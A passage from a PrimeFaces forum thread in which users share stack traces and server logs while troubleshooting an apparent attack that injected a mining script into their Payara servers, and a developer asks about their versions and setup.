	at org.primefaces.application.resource.StreamedContentHandler.handle(StreamedContentHandler.java:58)
	... 43 more
Caused by: java.lang.IllegalArgumentException: Cannot convert 

 of type class java.lang.String to interface org.primefaces.model.StreamedContent
	at com.sun.el.lang.ELSupport.coerceToType(ELSupport.java:424)
	at com.sun.el.ExpressionFactoryImpl.coerceToType(ExpressionFactoryImpl.java:85)
	... 49 more
]]

Last edited by tak3shi on 15 Jan 2018, 23:56, edited 2 times in total.

Melloware
Posts: 3716
Joined: 22 Apr 2013, 15:48

15 Jan 2018, 23:16

OK and you are using PF 6.1 and are you using an Apache Web Server in front of your Payara server? Just trying to narrow down the relationship of how this script is getting injected.
PrimeFaces Developer | PrimeFaces Extensions Developer
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1

tak3shi
Posts: 6
Joined: 25 Apr 2013, 22:58

15 Jan 2018, 23:24

I was wrong, one of my domains is using Primefaces 5.2

Yes, i am running Apache in front with automatic updated security updates, and just updated all other updates yesterday on Ubuntu 16.04.3 LTS (the hack was just some hours ago).

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

16 Jan 2018, 01:35

Yes i can confirm this too.

Code: Select all

[Server:frontend01] 23:22:14,785 SEVERE [org.primefaces.application.resource.StreamedContentHandler] (default task-29) Error in streaming dynamic resource. java.lang.IllegalArgumentException: Cannot convert
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]  of type class java.lang.String to interface org.primefaces.model.StreamedContent
Copied "as found" in my log (including the empty lines, [Server:frontend01 is the node's name]).
Right after this snippet the mining-script is injected.


Thanks for your help and your time!

Post Reply

Return to “PrimeFaces”

  • Information
  • Who is online

    Users browsing this forum: No registered users and 23 guests